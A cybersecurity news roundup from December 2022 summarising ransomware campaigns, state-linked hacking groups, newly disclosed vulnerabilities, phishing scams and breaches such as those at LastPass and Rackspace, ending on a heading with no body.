    Pwn2Own Toronto 2022 has ended with competitors earning $989,750 for 63 zero-day exploits (and multiple bug collisions) targeting consumer products between December 6th and December 9th. During this hacking competition, 26 teams and security researchers have targeted devices in the mobile phones, home automation hubs, printers, wireless routers, network-attached storage, and smart speakers categories, all up-to-date and in their default configuration.

    Clop Ransomware Uses TrueBot Malware for Access to Networks

    Security researchers have noticed a spike in devices infected with the TrueBot malware downloader created by a Russian-speaking hacking group known as Silence. The Silence group is known for its big heists against financial institutions, and has begun to shift from phishing as an initial compromise vector. The threat actor is also using a new custom data exfiltration tool called Teleport. Analysis of Silence's attacks over the past months revealed that the gang delivered Clop ransomware typically deployed by TA505 hackers, which are associated with the FIN11 group.

    Holiday Scams

    We've received an alarming amount of news and inquiries where individuals, including family members, are receiving a ton of email-related phishing scams. The messages increased in November and will likely continue into January. One report included a fraudulent FedEx template where an elderly family unknowingly entered their financial information into the supplied message fields; their debit card information was stolen and used by the adversary. In another reported phishing attempt, a McAfee template with a sense of urgency was sent to an elderly individual with the subject line, "Your devices are under attack; please Upgrade Now for Protection." The targeted individual contacted McAfee after looking up their support number, who then informed them it was a scam and that no action was needed.

    Cisco discloses high-severity IP phone bug with exploit code

    On Thursday, Cisco disclosed a vulnerability in its IP Phones (running 7800 and 8800 Series firmware) which can be exploited for remote code execution and denial of service attacks. Tracked as CVE-2022-20968, the vulnerability is due to an insufficient input validation of received Cisco Discovery Protocol packets, which enables an unauthenticated attacker to cause a stack overflow on the affected device.

    Software Supply Chain Attacks Leveraging Open-Sources Repos Growing

    Researchers from ReversingLabs released their report, The State of Software Supply Chain Security, published on December 5, 2022. The report examines an exponential increase in supply chain attacks between 2020 and early 2022. ReversingLabs based their research on the number of malicious packages uploaded on open-source repositories such as npm, PyPi and Ruby Gems.

    Hacked Corporate Email Accounts Used to Send MSP Remote Access Tool

    MuddyWater hackers, a group associated with Iran’s Ministry of Intelligence and Security (MOIS), used compromised corporate email accounts to deliver phishing messages to their targets. The group adopted the new tactic in a campaign that might have started in September but wasn’t observed until October and combined the use of a legitimate remote administration tool. MuddyWater has used legitimate remote administration tools for its hacking activities in the past. Researchers discovered campaigns from this group in 2020 and 2021 that relied on RemoteUtilities and ScreenConnect.

    Hackers use new Fantasy data wiper in coordinated supply chain attack

    The Iranian Agrius APT hacking group is using a new 'Fantasy' data wiper in supply-chain attacks impacting organizations in Israel, Hong Kong, and South Africa. The campaign started in February and unfolded at full scale in March 2022, breaching an IT support services firm, a diamond wholesaler, a jeweler, and an HR consulting company. In this campaign, Agrius used a new wiper named 'Fantasy' hidden inside a software suite created by an Israeli vendor. This software is commonly used in the diamond industry.

    Google: State Hackers Still Exploiting Internet Explorer Zero-Days

    Google's Threat Analysis Group (TAG) revealed today that a group of North Korean hackers tracked as APT37 exploited a previously unknown Internet Explorer vulnerability (known as a zero-day) to infect South Korean targets with malware. Google TAG was made aware of this recent attack on October 31 when multiple VirusTotal submitters from South Korea uploaded a malicious Microsoft Office document named "221031 Seoul Yongsan Itaewon accident response situation (06:00).docx." Once opened on the victims' devices, the document would deliver an unknown payload after downloading a rich text file (RTF) remote template that would render remote HTML using Internet Explorer. Loading the HTML content that delivered the exploit remotely allows the attackers to exploit the IE zero-day even if the targets weren't using it as their default web browser.

    Hackers use new Fantasy data wiper in coordinated supply chain attack

    The Iranian Agrius APT hacking group is using a new 'Fantasy' data wiper in supply-chain attacks impacting organizations in Israel, Hong Kong, and South Africa. The campaign started in February and unfolded at full scale in March 2022, breaching an IT support services firm, a diamond wholesaler, a jeweler, and an HR consulting company. In this campaign, Agrius used a new wiper named 'Fantasy' hidden inside a software suite created by an Israeli vendor. This software is commonly used in the diamond industry.

    Prolific Chinese Hackers Stole US COVID Funds

    A Chinese state-sponsored APT group has stolen at least $20m from US COVID-relief funds, in what appears to be a first-of-its kind campaign, according to the Secret Service. The service told NBC that it linked prolific Chengdu-based APT41 to the raids, which targeted Small Business Administration (SBA) loans and unemployment insurance funds in more than 12 states. However, the true scale of the campaign may be much greater. The Secret Service said it has over 1000 investigations currently open into theft and fraud related to public benefits programs.

    New Zerobot Malware Has 21 Exploits for Big-Ip, Zyxel, D-Link Devices

    A new Go-based malware named ‘Zerobot’ has been spotted in mid-November using exploits for almost two dozen vulnerabilities in a variety of devices that include F5 BIG-IP, Zyxel firewalls, Totolink and D-Link routers, and Hikvision cameras. The purpose of the malware is to add compromised devices to a distributed denial-of-service (DDoS) botnet to launch powerful attacks against specified targets.

    Apple Rolls Out End-To-End Encryption for iCloud Backups

    Apple introduced today Advanced Data Protection for iCloud, a new feature that uses end-to-end encryption to protect sensitive iCloud data, including backups, photos, notes, and more. For customers who choose to enable this new security feature, Advanced Data Protection is designed to safeguard "most iCloud data even in the case of a data breach in the cloud" by ensuring that encrypted cloud data can only be decrypted on the users' trusted devices.

    New Go-based Botnet Exploiting Exploiting Dozens of IoT Vulnerabilities to Expand its Network

    Fortinet Labs recently uncovered a new botnet dubbed Zerobot that is rapidly growing in number by exploiting dozens of security vulnerabilities in IoT devices. Zerobot is a go-based botnet that comes with several modules, including self-replication, attacks for different protocols, and self-propagation. According to researchers, two versions of Zerobot have been spotted to date. The first one which was used before November 24 contains basic functions while the current version has been updated to include a “selfRepo” module, enabling it to reproduce itself and infect more devices with different protocols or vulnerabilities.

    Chinese Hackers Using Russo-Ukrainian War Decoys to Target APAC and European Entities

    The China-linked nation-state hacking group referred to as Mustang Panda is using lures related to the ongoing Russo-Ukrainian War to attack entities in Europe and the Asia Pacific. That's according to the BlackBerry Research and Intelligence Team, which analyzed a RAR archive file titled "Political Guidance for the new EU approach towards Russia.rar." Some of the targeted countries include Vietnam, India, Pakistan, Kenya, Turkey, Italy, and Brazil.

    Christmas Warning: Threat Actors Impersonate your Favorite Brands to Attack, Finds CSC

    In the run-up to Christmas, one of the busiest times for online shopping and e-commerce, we are likely to see a spike in fraudulent domain name registrations. Domain provider CSC analyzed threatening domains targeting 10 of the biggest brands in the world in a report published on December 6, 2022. These include Amazon, Walmart, McDonald’s, Tencent, Google, Microsoft, Apple and Facebook.

    Massive DDoS Attack Takes Russia’s Second-largest Bank VTB Offline

    Russia's second-largest financial institution VTB Bank says it is facing the worse cyberattack in its history after its website and mobile apps were taken offline due to an ongoing DDoS (distributed denial of service) attack. "At present, the VTB technological infrastructure is under unprecedented cyberattack from abroad," stated a VTB spokesperson to TASS (translated). "It is not only the largest cyberattack recorded this year, but in the entire history of the bank.

    Ransomware Attack in New Zealand Has Cascading Effects

    A ransomware attack on a New Zealand third-party managed IT service provider affected several government agencies across the country - including the Ministry of Justice and the national health authority. The Office of the Privacy Commissioner said "urgent work" is underway to understand the full impact of the incident. The third-party provider is Mercury IT, whose LinkedIn page describes it as a small business based in Wellington. It provides a wide range of IT services to customers throughout New Zealand, according to a one-page website on the company domain.

    Rackspace Confirms Outage Was Caused by Ransomware Attack

    Texas-based cloud computing provider Rackspace has confirmed today that a ransomware attack is behind an ongoing Hosted Exchange outage described as an "isolated disruption." In a statement the company said, "As you know, on Friday, December 2nd, 2022, we became aware of suspicious activity and immediately took proactive measures to isolate the Hosted Exchange environment to contain the incident.

    Severe AMI MegaRAC flaws impact servers from AMD, ARM, HPE, Dell, others

    In August, researchers at Eclypsium discovered a set of vulnerabilities in the American Megatrends MegaRAC Baseboard Management Controller (BMC) software which can be exploited by attackers under certain conditions to execute code, bypass authentication, and perform user enumeration. The flaws were discovered after researchers examined leaked proprietary code of American Megatrends, specifically, the MegaRAC BMC firmware. MegaRAC BMC is a remote system management solution that allows admins to troubleshoot servers remotely as if they were standing in front of the device. As of writing MegaRAC BMC firmware is used by at least 15 server manufacturers, including AMD, Ampere Computing, ASRock, Asus, ARM, Dell EMC, Gigabyte, Hewlett-Packard Enterprise, Huawei, Inspur, Lenovo, Nvidia, Qualcomm, Quanta, and Tyan.

    Russian Hackers Use Western Networks to Attack Ukraine

    Russian hackers are using their presence inside the networks of organizations in the UK, US and elsewhere to launch attacks against Ukraine, a new report from Lupovis has revealed. The Scottish security firm used a series of web decoys to lure Russian threat actors in an attempt to study their TTPs. Using a fake document leaked to cybercrime forums, the researchers leaked fake usernames, passwords, and other information that would entice actors to look further.

    Microsoft Warns of Russian Cyberattacks Throughout the Winter

    Microsoft has warned of Russian-sponsored cyberattacks continuing to target Ukrainian infrastructure and NATO allies in Europe throughout the winter. Redmond said in a report published over the weekend that it observed a pattern of targeted attacks on infrastructure in Ukraine by the Russian military intelligence threat group Sandworm in association with missile strikes. The attacks have been accompanied by a propaganda campaign to undermine Western support (from the U.S., EU, and NATO) for Ukraine, “We believe these recent trends suggest that the world should be prepared for several lines of potential Russian attack in the digital domain over the course of this winter. Russia will seek to exploit cracks in popular support for Ukraine to undermine coalitions essential to Ukraine's resilience, hoping to impair the humanitarian and military aid flowing to the region. We should also be prepared for cyber-enabled influence operations that target Europe to be conducted in parallel with cyberthreat activity.

    ConnectWise Quietly Patches Flaw That Helps Phishers

    ConnectWise, which offers a self-hosted, remote desktop software application that is widely used by Managed Service Providers (MSPs), is warning about an unusually sophisticated phishing attack that can let attackers take remote control over user systems when recipients click the included link. The warning comes just weeks after the company quietly patched a vulnerability that makes it easier for phishers to launch these attacks.

    Critical Ping Bug Potentially Allows Remote Hack of FreeBSD Systems

    The maintainers of the FreeBSD operating system released updates to address a critical flaw, tracked as CVE-2022-23093, in the ping module that could be potentially exploited to gain remote code execution. A remote attacker can trigger the vulnerability, causing the ping program to crash and potentially leading to remote code execution in ping, “ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a “quoted packet,” which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header.” reads the advisory for this issue.

    SIM Swapper Gets 18-Months for Involvement in $22 Million Crypto Heist

    Florida man Nicholas Truglia was sentenced to 18 months in prison on Thursday for his involvement in a fraud scheme that led to the theft of millions from cryptocurrency investor Michael Terpin. The funds were stolen following a January 2018 SIM swap attack that allowed Truglia's co-conspirators to hijack Terpin's phone number and fraudulently transfer roughly $23.8 million in cryptocurrency from his crypto wallet to an online account under Truglia's control. According to the indictment, the defendant "agreed to convert the stolen cryptocurrency into Bitcoin, another form of cryptocurrency, and then transfer the Bitcoin to other Scheme Participants, while keeping a portion as payment for his services.” In all, Truglia kept at least approximately $673,000 of the stolen funds to assist the other fraudsters in collecting and dividing the illegally obtained funds among them. The 25-year-old was ordered to pay a total of $20,379,007 to Terpin within the next 60 days, until January 30, 2023.

    New CryWiper Data Wiper Targets Russian Courts, Mayor’s Offices

    Since the start of the Russo-Ukraine war, Ukraine has been the target of wiper malware including DoubleZero, IsaacWiper, HermeticWiper, CaddyWiper, WhisperGate, AcidRain, and Industroyer2. Cybersecurity firm Kaspersky recently disclosed the discovery of yet another wiper malware dubbed CryWiper, which it says was used to attack an organization’s network in the Russian Federation. Russia media outlets also stated that the malware was used in attacks against Russian Mayor’s offices and courts. According to Kaspersky, CryWiper masquerades as ransomware and extorts money from the victim for “decrypting” data, but in reality, it does not actually encrypt and rather intentionally destroys data in the affected system making recovery impossible.

    Google Chrome Emergency Update Fixes 9th Zero-day of the Year

    On Friday, Google released security updates to address a high-severity zero-day in its Chrome web browser. Tracked as CVE-2022-4262, the vulnerability is related to a type confusion weakness in the Chrome V8 JavaScript engine. “Even though type confusion security flaws generally lead to browser crashes after successful exploitation by reading or writing memory out of buffer bounds, threat actors can also exploit them for arbitrary code execution” (The Bleeping Computer, 2022). To address CVE-2022-4262, Google has released Chrome version 108.0.5359.94/.95 for Windows and version 108.0.5359.94 for macOS and Linux. Users have been advised to upgrade to the latest versions as soon as possible to mitigate potential threats.

    Tractors vs. Threat Actors: How to Hack a Farm

    ESET released an article on security challenges faced by modern UK farms. During a National Farmer’s Union (NFU) meeting in southern England, a farmer shared details about how his cows had recently “been hacked.” He noted that his farm used relatively high tech milking machines that were abused by a threat actor after he had clicked on a malicious email attachment. After his computer network went down, the farmer realized he had no way of knowing which cows had been milked, or which cows needed milking next. “Making things worse, it wasn’t just his cows that had been attacked, according to the farmer. All the farm’s online accounts had also been compromised and, therefore, his tractors had been taken offline, leaving him with no information on which of his fields had been cropped or still needed cropping, as the tractor usually plans out the routes via his online accounts.

    Cuba Ransomware Raked in $60 Million From Over 100 Victims

    This is a follow-up to another advisory issued one year ago, which warned that the cybercrime group compromised dozens of organizations from U.S. critical infrastructure sectors, making over $40 million since it started targeting U.S. companies. "Since the release of the December 2021 FBI Flash, the number of U.S. entities compromised by Cuba ransomware has doubled, with ransoms demanded and paid on the increase.

    New Redigo Malware Drops Stealthy Backdoor on Redis Servers

    The Go-based malware threat that researchers call Redigo has been targeting Redis servers vulnerable to CVE-2022-0543 to plant a stealthy backdoor and allow command execution. CVE-2022-0543 is a critical vulnerability in Redis (Remote Dictionary Server) software with a maximum severity rating. It was discovered and fixed in February 2022. Per usual, attackers continued to leverage it on unpatched machines several months after the fix came out, as proof-of-concept exploit code became publicly available.

    Android Malware Infected 300,000 Devices to Steal Facebook Accounts

    An Android malware campaign masquerading as reading and education apps has been underway since 2018, attempting to steal Facebook account credentials from infected devices. According to a new report by Zimperium, the campaign has infected at least 300,000 devices across 71 countries, primarily focusing on Vietnam. Some apps used for spreading the trojan, which Zimperium named 'Schoolyard Bully,' were previously on Google Play but have since been removed. However, Zimperium warns that the apps continue to be spread through third-party Android app stores.

    Researchers Disclose Supply-Chain Flaw Affecting IBM Cloud Databases for PostgreSQL

    IBM recently addressed a high-severity flaw impacting its Cloud Databases (ICD) for PostgreSQL product that could be exploited to tamper with internal repositories and execute malicious code. Dubbed “Hell’s Keychain” by cloud security firm Wiz, the vulnerability is related to a privilege escalation flaw that allows a malicious threat actor to gain superuser (aka “ibm”) privileges and remotely execute code to read and modify the data stored in the PostgreSQL database.

    Samsung, LG, Mediatek Certificates Compromised to Sign Android Malware

    Multiple platform certificates used by Android OEM device vendors to digitally sign core system applications have also been used to sign Android apps containing malware. OEM Android device manufacturers use platform certificates, or platform keys, to sign devices' core ROM images containing the Android operating system and associated apps.

    New Ducklogs Malware Service Claims Having Thousands of ‘Customers’

    A new malware-as-a-service (MaaS) operation named 'DuckLogs' has emerged, giving low-skilled attackers easy access to multiple modules to steal information, log key strokes, access clipboard data, and remote access to the compromised host. DuckLogs is entirely web-based. It claims to have thousands of cybercriminals paying a subscription to generate and launch more than 4,000 malware builds.

    LastPass Suffers Another Security Breach; Exposed Some Customers Information

    Popular password management service LastPass said it's investigating a second security incident that involved attackers accessing some of its customer information, “We recently detected unusual activity within a third-party cloud storage service, which is currently shared by both LastPass and its affiliate, GoTo.GoTo, formerly called LogMeIn, acquired LastPass in October 2015. In December 2021, the Boston-based firm announced plans to spin off LastPass as an independent company. The digital break-in resulted in the unauthorized third-party leveraging information obtained following a previous breach in August 2022 to access "certain elements of our customers' information.”

    Cybersecurity Researchers Take Down DDoS Botnet by Accident

    While analyzing its capabilities, Akamai researchers have accidentally taken down a cryptomining botnet that was also used for distributed denial-of-service (DDoS) attacks. As revealed in a report published earlier this month, the KmsdBot malware behind this botnet was discovered by members of the Akamai Security Intelligence Response Team (SIRT) after it infected one of their honeypots. KmsdBot targets Windows and Linux devices with a wide range of architectures, and it infects new systems via SSH connections that use weak or default login credentials. Compromised devices are being used to mine for cryptocurrency and launch DDoS attacks, with some of the previous targets being gaming and technology companies, as well as luxury car manufacturers.

    Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, and Windows Zero-Days

    A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018. ‘Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to deploy a payload to a target device,’ Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoit Sevens said in a write-up. Variston, which has a bare-bones website, claims to ‘offer tailor made Information Security Solutions to our customers,’ ‘design custom security patches for any kind of proprietary system,’ and support the ‘the discovery of digital information by [law enforcement agencies],‘ among other services.

    New Windows Malware Scans Victims’ Mobile Phones for Data to Steal

    Security researchers found a previously unknown backdoor they call Dophin that's been used by North Korean hackers in highly targeted operations for more than a year to steal files and send them to Google Drive storage. According to research from cybersecurity company ESET, the APT 37 threat group (a.k.a. Reaper, Red Eyes, Erebus, ScarCruft) used the newly discovered malware against very specific entities. The group has been associated with espionage activity aligining with North Korean interests since 2012.

    Android and iOS Loan Apps With 15 Million Installs Extorted Borrowers

    Over 280 Android and iOS apps on the Google Play and the Apple App stores trapped users in loan schemes with misleading terms and employed various methods to extort and harass borrowers. To fuel the operation's extortion attempts, the apps stole excessive amounts of data from mobile phones not usually required to offer loans. In a new report by cybersecurity firm Lookout, researchers uncovered 251 Android 35 iOS lending apps that were downloaded a combined total of 15 million times, mostly from users in India, Colombia, Mexico, Nigeria, Thailand, the Philippines, and Uganda. Lookout reported all of them to Google and Apple for removal and was successfully able to remove all of them.

    Irish Regulator Fines Facebook $277 Million for Leak of Half a Billion Users' Data

    Ireland's Data Protection Commission (DPC) has levied fines of €265 million ($277 million) against Meta Platforms for failing to safeguard the personal data of more than half a billion users of its Facebook service, ramping up privacy enforcement against U.S. tech firms. The fines follow an inquiry initiated by the European regulator on April 14, 2021, close on the heels of a leak of a "collated dataset of Facebook personal data that had been made available on the internet.

    Trigona Ransomware Spotted in Increasing Attacks Worldwide

    A previously unnamed ransomware has rebranded under the name 'Trigona,' launching a new Tor negotiation site where they accept Monero as ransom payments. Trigona has been active for some time, with samples seen at the beginning of the year. However, those samples utilized email for negotiations and were not branded under a specific name. As discovered by MalwareHunterTeam, starting in late October 2022, the ransomware operation launched a new Tor negotiation site where they officially named themselves 'Trigona.' As Trigona is the name of a family of large stingless bees, the ransomware operation has adopted a logo showing a person in a cyber bee-like costume.

    Researchers Find a Way Malicious NPM Libraries Can Evade Vulnerability Detection

    New findings from cybersecurity firm JFrog show that malware targeting the npm ecosystem can evade security checks by taking advantage of an "unexpected behavior" in the npm command line interface (CLI) tool. npm CLI's install and audit commands have built-in capabilities to check a package and all of its dependencies for known vulnerabilities, effectively acting as a warning mechanism for developers by highlighting the flaws. But as JFrog established, the security advisories are not displayed when the packages follow certain version formats, creating a scenario where critical flaws could be introduced into their systems either directly or via the package's dependencies.

    Oracle Fusion Middleware Vulnerability Actively Exploited in the Wild: CISA

    The US Cybersecurity and Infrastructure Security Agency (CISA) added a critical flaw affecting Oracle Fusion Middleware systems to its Known Exploited Vulnerabilities (KEV) Catalog on Monday. The bug, which CISA confirmed has been exploited in the wild, allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. Successful attacks targeting this vulnerability can consequently result in the program's takeover.

    Acer Fixes UEFI Bugs That Can Be Used to Disable Secure Boot

    Acer has fixed a high-severity vulnerability affecting multiple laptop models that could enable local attackers to deactivate UEFI Secure Boot on targeted systems. The Secure Boot security feature blocks untrusted operating systems bootloaders on computers with a Trusted Platform Module (TPM) chip and Unified Extensible Firmware Interface (UEFI) firmware to prevent malicious code like rootkits and bootkits from loading during the startup process.

    Experts Found a Vulnerability in AWS Appsync

    “Amazon Web Services (AWS) has addressed a cross-tenant confused deputy problem in its platform that could have allowed threat actors to gain unauthorized access to resources. The problem was reported to the company by researchers from Datadog on September 1, 2022, and the bug was solved on September 6.” “A confused deputy problem occurs when an entity that doesn’t have permission to perform an action can coerce a more-privileged entity to perform the action. AWS provides tools to protect an account if the owner provides third parties (known as cross-account) or other AWS services (known as cross-service) access to resources in your account.”

    Trio of New Vulnerabilities Found in Industrial Controllers

    Researchers at Vedere Labs disclosed a trio of new security vulnerabilities that can be used to attack automated industrial controllers and a popular piece of software used to program millions of smart devices in critical infrastructure. The bugs (tracked under CVE-2022-4048, CVE-2022-3079 and CVE-2022-3270) allow for logic manipulation and denial of service, primarily impacting products from two major German vendors: Festo automated controllers and CODESYS runtime, an application that allows developers to program smart devices and is, according to Vedere Labs, “used by hundreds of device manufacturers in different industrial sectors.

    US Bans Sales of Huawei, Hikvision, ZTE, and Dahua Equipment

    The Federal Communications Commission adopted new rules prohibiting communications equipment deemed to pose an unacceptable risk to national security from being authorized for importation or sale in the United States. The U.S. ban covers not only the parent companies but their subsidiaries and affiliates as well. The new rules prohibit the authorization of equipment through the FCC’s Certification process and make clear that such equipment cannot be authorized under the Supplier’s Declaration of Conformity process or be imported or marketed under rules that allow exemption from an equipment authorization.

    5.4 Million Twitter Users’ Stolen Data Leaked Online — More Shared Privately

    The data consists of scraped public information as well as private phone numbers and email addresses that are not meant to be public. While most of the data consisted of public information, such as Twitter IDs, names, login names, locations, and verified status, it also included private information, such as phone numbers and email addresses. Pompompurin, the owner of the Breached hacking forum, told BleepingComputer this weekend that they were responsible for exploiting the bug and creating the massive dump of Twitter user records after another threat actor known as 'Devil' shared the vulnerability with them. In addition to the 5.4 million records for sale, there were also an additional 1.4 million Twitter profiles for suspended users collected using a different API, bringing the total to almost 7 million Twitter profiles containing private information.

    New Ransomware Attacks in Ukraine Linked to Russian Sandworm Hackers

    On November 21, ESET uncovered a new wave of ransomware dubbed RansomBoggs being deployed in the networks of multiple Ukrainian organizations. According to researchers, the deployment of the new malware is very similar to the previous Industroyer2 attacks which were attributed to Sandworm, a notorious Russian military threat group. “There are similarities with previous attacks conducted by Sandworm: a PowerShell script used to distribute the .NET ransomware from the domain controller is almost identical to the one seen last April during the Industroyer2 attacks against the energy sector,” stated ESET in its post on Twitter. The PowerShell script which CERT-UA refers to as POWERGAP was also used to deploy CaddyWiper (destructive data wiper malware) using Arguepatch (malware loader) in attacks against Ukrainian organizations in March.

    Google Pushes Emergency Chrome Update to Fix 8th Zero-Day in 2022

    Google recently released security updates to address a high-severity heap buffer overflow in GPU in Chrome web browser. The vulnerability is being tracked as CVE-2022-4135 and was uncovered by Clement Lecigne of Google's Threat Analysis Group on November 22, 2022. Like usual, the technical details of the vulnerability have yet to be released to give users enough time to apply the security updates.

    Microsoft Warns: Forgotten Open-source Web Server Could Let Hackers 'Silently' Gain Access to Your SDK's

    Microsoft shared details on an open-source software (OSS) supply chain incident, after looking into an April 2022 report by security vendor Recorded Future about a “likely Chinese State-sponsored” threat actor targeting Indian power companies. Recorded Future found dozens of indicators between late 2021 and Q1 2022 that were used in intrusions against multiple organizations in India’s energy sector. Microsoft notes the latest related activity was in October 2022, and says its researchers identified a "vulnerable component on all the IP addresses published as IOCs" by Record Future and that it found evidence of a "supply chain risk that may affect millions of organizations and devices."

    Russian Cybergangs Stole Over 50 Million Passwords This Year

    At least 34 distinct Russian-speaking cybercrime groups using info-stealing malware like Raccoon and Redline have collectively stolen 50,350,000 account passwords from over 896,000 individual infections from January to July 2022. The stolen credentials were for cryptocurrency wallets, Steam, Roblox, Amazon, and PayPal accounts, as well as payment card records. According to a report from Group-IB, whose analysts have been tracking these operations globally, most victims are based in the United States, Germany, India, Brazil, and Indonesia, but the malicious operations targeted 111 countries.

    Ducktail Malware Operation Evolves with New Malicious Capabilities

    Operators of the Ducktail information stealer have returned introducing new malicious capabilities. Ducktail is a malware designed to siphon browser cookies and take advantage of authenticated Facebook sessions to steal information from victims and run ads on their accounts for monetary gain. The info-stealer is attributed to a Vietnamese threat actor which is known for targeting businesses in the digital marketing and advertising sectors which are active on the Facebook Ads and Business platform. “Also targeted are individuals within prospective companies that are likely to have high-level access to Facebook Business accounts. This includes marketing, media, and human resources personnel.

    Backdoored Chrome Extension Installed by 200,000 Roblox Players

    SearchBlox' installed by more than 200,000 users, has been discovered to contain a backdoor that can steal your Roblox credentials and your assets on Rolimons, a Roblox trading platform. After analyzing the extension code, which indicated the presence of a backdoor, it has been suggested the backdoor was introduced either intentionally by its developer or after an initial compromise. The extensions claim to let allow users to "search Roblox servers for the desired player... blazingly fast." Suspicions arose among the Roblox community members of SearchBlox containing malware where someone tweeted that the Popular plug-in SearchBlox has been COMPROMISED / BACKDOORED - and if you have it, your account may be at risk.

    Hackers Breach Energy Orgs via Bugs in Discontinued Web Server

    Microsoft said today that security vulnerabilities found to impact a web server discontinued since 2005 have been used to target and compromise organizations in the energy sector. Recorded Future revealed in a report published in April that state-backed Chinese hacking groups (including one traced as RedEcho) targeted multiple Indian electrical grid operators, compromising an Indian national emergency response system and the subsidiary of a multinational logistics company.

    Black Basta Using QBot Malware to Target US-Based Companies

    Researchers say Black Basta is dropping QBot malware - also called QakBot - in a widespread ransomware campaign targeting mostly U.S.-based companies. In the group's latest campaign, attackers are again using QBot to install a backdoor and then drop in encryption malware and other malicious code, according to Cybereason.

    Experts Warn Threat Actors May Abuse Red Team Tool Nighthawk

    Security researchers are warning that a new red-teaming tool dubbed “Nighthawk” may soon be leveraged by threat actors. Created in late 2021 by MDSec, the tool is best described as an advanced C2 framework, which functions like Cobalt Strike and Brute Ratel as a commercially distributed remote access trojan (RAT) designed for legitimate use.

    Hospital Workers Charged with Selling Patient Information

    The U.S. Justice Department in a statement says a federal grand jury on Nov. 10 indicted five former employees of Memphis, Tennessee-based Methodist Le Bonheur Healthcare with accessing and disclosing patient information to a sixth individual, Roderick Harvey, without the knowledge, consent or authorization of the patients. Four of the employees worked as financial counselors at Methodist Healthcare, and one of the individuals held a variety of roles, including PBX unit secretary, according to court documents. The longest-tenured employee, Taylor, worked in the hospital's emergency room as a financial counselor for 18 years, according to court documents.

    Emotet Is Back and Delivers Payloads Like Icedid and Bumblebee

    In April, the operators of the infamous Emotet botnet started testing new attack techniques in response to Microsoft’s move to disable Visual Basic for Applications (VBA) macros by default. In June, Proofpoint experts spotted a new variant of the Emotet bot that uses a new module to steal credit card information stored in the Chrome web browser. The experts noticed multiple changes to the bot and its payloads, and the operators introduced changes to the malware modules, loader, and packer. Below are the changes observed by Proofpoint, “The volume of emails that Emotet sending bots attempt to deliver each day is in the hundreds of thousands. These numbers are comparable to historic averages. Hence, it does not appear that the Emotet botnet lost any significant spamming capability during the inactive period.” reads the report published by Proofpoint.

    Chinese 'Mustang Panda' Hackers Actively Targeting Governments Worldwide

    A notorious advanced persistent threat actor known as Mustang Panda has been linked to a spate of spear-phishing attacks targeting government, education, and research sectors across the world. The primary targets of the intrusions from May to October 2022 included counties in the Asia Pacific region such as Myanmar, Australia, the Philippines, Japan, and Taiwan, cybersecurity firm Trend Micro said in a Friday report.

    Google Provides Rules to Detect Tens of Cracked Versions of Cobalt Strike

    Google Cloud researchers announced to have discovered 34 different Cobalt Strike hacked release versions with a total of 275 unique JAR files across these versions. Google Cloud Threat Intelligence (GCTI) researchers developed a set of YARA rules to detect hacked variants in the wild with a high degree of accuracy. The researchers noticed that each Cobalt Strike version contains approximately 10 to 100 attack template binaries The experts were able to locate versions of the Cobalt Strike JAR file starting with version 1.44 (which was released in 2012) up to the latest version at the time of publishing the analysis, Cobalt Strike 4.7.

    New Ransomware Encrypts Files, Then Steals Your Discord Account

    When a user logs into Discord with their credentials, the platform sends back a user authentication token saved on the computer. This token can then be used to log in as the user or to issue API requests that retrieve information about the associated account. Threat actors commonly attempt to steal these tokens because they enable them to take over accounts or, even worse, abuse them for further malicious attacks.

    Netflix Phishing Emails Surge 78%

    Researchers from Egress detailed an increase in phishing campaigns spoofing the Netflix brand since October, noting a 78% increase in impersonation attacks against the brand. If employees use the same credentials for personal accounts like Netflix as their work accounts, campaigns like this may impact corporate systems and data, warned Egress. The group behind the attacks is using Unicode characters to bypass natural language processing (NLP) scanning, which will prevent traditional anti-phishing filters from catching it. “Unicode helps to convert international languages within browsers – but it can also be used for visual spoofing by exploiting international language characters to make a fake URL look legitimate,” Egress wrote.

    Atlassian Fixes Critical Command Injection Bug in Bitbucket Server

    Atlassian has released updates to address critical-severity updates in its centralized identity management platform, Crowd Server and Data Center, and in Bitbucket Server and Data Center, the company's solution for Git repository management. Both security vulnerabilities received a severity rating of 9 out of 10 (calculated by Atlassian) and affect multiple versions of the products.

    Previously Unidentified ARCrypter Ransomware Expands Worldwide

    A previously unknown ‘ARCrypter’ ransomware that compromised key organizations in Latin America is now expanding its attacks worldwide. Threat actors behind the new ransomware family attacked a government agency in Chile last August, targeting both Linux and Windows systems and appending the “.crypt” extension on encrypted files. Back then, Chilean threat analyst Germán Fernández told BleepingComputer that the strain appeared entirely new, not connected to any known ransomware families. Researchers at BlackBerry have confirmed this via a report that identifies the family as ARCrypter and links it to a second attack against the Colombia National Food and Drug Surveillance Institute (Invima) in October.

    TLP: CLEAR - HIVE RANSOMWARE

    Today, CISA, the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) released joint Cybersecurity Advisory (CSA) #StopRansomware: Hive Ransomware to provide network defenders tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Hive ransomware variants. FBI investigations identified these TTPs and IOCs as recently as November 2022.

    FBI-Wanted Leader of the Notorious Zeus Botnet Gang Arrested in Geneva

    A Ukrainian national who has been wanted by the U.S for over a decade has been arrested by Swiss authorities for his role in a notorious cybercriminal ring that stole millions of dollars from victims' bank accounts using malware called Zeus. Vyacheslav Igorevich Penchukov, who went by online pseudonyms "tank" and "father," is said to have been involved in the day-to-day operations of the group. He was apprehended on October 23, 2022, and is pending extradition to the U.S. Details of the arrest were first reported by independent security journalist Brian Krebs.

    High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

    Cybersecurity firm Rapid7 recently disclosed two high-severity vulnerabilities in F5 BIG-IP and BIG-IQ devices which could enable complete device takeover upon successful exploitation. The first flaw which is being tracked as CVE-2022-41622 is related to a cross-site request forgery vulnerability in BIG-IP and BIG-IQ products and can allow a malicious threat actor to execute code remotely without authentication.

    Ukrainian CERT Discloses New Data-Wiping Campaign

